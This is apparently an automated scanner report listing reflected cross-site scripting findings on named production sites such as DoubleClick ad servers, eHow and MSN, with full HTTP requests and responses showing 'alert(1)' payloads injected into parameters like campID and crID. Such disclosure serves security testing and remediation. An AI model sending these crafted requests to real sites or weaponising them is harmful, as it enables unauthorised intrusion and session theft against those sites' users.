1.642. https://www.ehow.com/WebResource.axd [Referer HTTP header]

1.643. https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css [Referer HTTP header]

1.644. https://www.ehow.com/forms/ [Referer HTTP header]

1.645. https://www.ehow.com/forms/PasswordRetrieval.aspx [Referer HTTP header]

1.646. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx [Referer HTTP header]

1.647. https://www.ehow.com/forms/signin.aspx [Referer HTTP header]

1.648. https://www.ehow.com/privacy.aspx [Referer HTTP header]

1.649. https://www.ehow.com/terms_use.aspx [Referer HTTP header]

1.650. http://blekko.com/join [name of an arbitrarily supplied request parameter]

1.651. http://blekko.com/login [name of an arbitrarily supplied request parameter]

1.652. http://moneycentral.msn.com/investor/home.aspx [name of an arbitrarily supplied request parameter]

1.653. http://seg.sharethis.com/getSegment.php [__stid cookie]



1. Cross-site scripting (reflected)
There are 653 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [campID parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c8"-alert(1)-"ed8d98066a7 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8925

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D87663
...[SNIP]...

1.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"6726dbbe500 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8982

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F
...[SNIP]...

1.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 112f0"-alert(1)-"3c37d85996f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2ffree.turbotax.c
...[SNIP]...

1.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3b8"-alert(1)-"ad6539c90a was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8942

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2fl
...[SNIP]...

1.5. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b3b5"-alert(1)-"6e28e40048e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http
...[SNIP]...

1.6. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddba6"-alert(1)-"6c8bf62d897 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
